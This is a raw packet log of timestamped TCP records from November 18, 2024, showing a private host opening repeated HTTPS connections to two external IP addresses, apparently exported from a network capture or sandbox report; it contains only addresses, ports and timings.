                                                                                                                                                                                                                              Nov 18, 2024 00:15:26.770112991 CET49708443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:26.770131111 CET44349708172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.372482061 CET44349708172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.372591972 CET49708443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.373729944 CET49708443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.373744011 CET44349708172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.373953104 CET44349708172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.375049114 CET49708443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.375193119 CET49708443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.375231028 CET44349708172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.375281096 CET49708443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.419338942 CET44349708172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.970705986 CET44349708172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.970947981 CET49708443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.970957994 CET44349708172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:27.971024990 CET49708443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.214786053 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.214826107 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.214920044 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.215198040 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.215213060 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.840820074 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.840912104 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.842084885 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.842093945 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.842582941 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.843735933 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.843863010 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.843894005 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.843971014 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:28.843976974 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.603629112 CET44349709172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.603905916 CET49709443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.846448898 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.846548080 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.846631050 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.846916914 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:29.846952915 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.463799000 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.463927031 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.465462923 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.465508938 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.466248989 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.467463017 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.467636108 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:30.467686892 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.066644907 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.066884041 CET44349710172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.066888094 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.066945076 CET49710443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.141978979 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.142018080 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.142087936 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.142359018 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.142371893 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.771137953 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.771416903 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.774873018 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.774883032 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.775377989 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.776602030 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.776746988 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:31.776777983 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.288935900 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.289186001 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.289352894 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.290678024 CET49711443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.290699959 CET44349711172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.492495060 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.492533922 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.492609978 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.493061066 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:32.493074894 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.112265110 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.112355947 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.113966942 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.113981962 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.114372015 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.115578890 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.115705967 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.115714073 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.639472961 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.639734983 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.639874935 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.639874935 CET49712443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.639909983 CET44349712172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.770396948 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.770490885 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.770606995 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.770912886 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:33.770947933 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.414024115 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.414145947 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.415307999 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.415328026 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.415680885 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.417241096 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.417380095 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.417386055 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.800081968 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.800246954 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.800326109 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.800407887 CET49713443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.800434113 CET44349713172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.833964109 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.834005117 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.834111929 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.834342957 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:34.834356070 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.490267992 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.490437031 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.491589069 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.491600037 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.492533922 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.494095087 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.494118929 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:35.494205952 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.027676105 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.027915955 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.027997971 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.028053999 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.028078079 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.028093100 CET49714443192.168.2.16172.67.131.254
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.028100967 CET44349714172.67.131.254192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.043014050 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.043102980 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.043209076 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.043478012 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.043508053 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.680211067 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.680326939 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.682110071 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.682125092 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.682609081 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.683706045 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.731343985 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.038685083 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.038820982 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.038908958 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.038919926 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.038973093 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039036036 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039052963 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039174080 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039235115 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039248943 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039383888 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039442062 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039455891 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039546013 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039608955 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.039623976 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.079627991 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158283949 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158480883 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158576965 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158596039 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158641100 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158718109 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158734083 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158828974 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158889055 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158902884 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.158993959 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.159049988 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.159063101 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.207595110 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.207626104 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.255620956 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277153015 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277345896 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277403116 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277420044 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277581930 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277642012 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277656078 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277762890 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277822018 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277836084 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.277966976 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.278023958 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.278037071 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.278129101 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.278189898 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.278203011 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.319675922 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.396421909 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.396640062 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.396696091 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.396716118 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.396817923 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.396878958 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.396893978 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.396996975 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.397051096 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.397066116 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.397202969 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.397258043 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.397272110 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.442296028 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.442392111 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.442408085 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.442475080 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.515809059 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.515836000 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.515897989 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.515945911 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.516002893 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.516019106 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.516163111 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.516237974 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.516267061 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.516330004 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.516762018 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.516844034 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.635165930 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.635276079 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.635277033 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.635310888 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.635363102 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.635390997 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.635525942 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.635616064 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.636313915 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.636393070 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.754545927 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.754647970 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.754699945 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.754827023 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.754853010 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.754929066 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.755502939 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.755595922 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.755690098 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.755763054 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.873747110 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.873850107 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.874073982 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.874156952 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.874228001 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.874303102 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.874963999 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.875032902 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.919239044 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.919358969 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.993201017 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.993321896 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.993352890 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.993381023 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.993424892 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.993457079 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.993798971 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.993870974 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.994292974 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:37.994365931 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.112992048 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.113168001 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.113210917 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.113275051 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.113275051 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.113275051 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.113344908 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.113408089 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.114155054 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.114237070 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.158225060 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.158406973 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232126951 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232218027 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232445002 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232512951 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232644081 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232711077 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232739925 CET44349715172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232777119 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232777119 CET49715443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:38.232795000 CET44349715172.67.185.54192.168.2.16
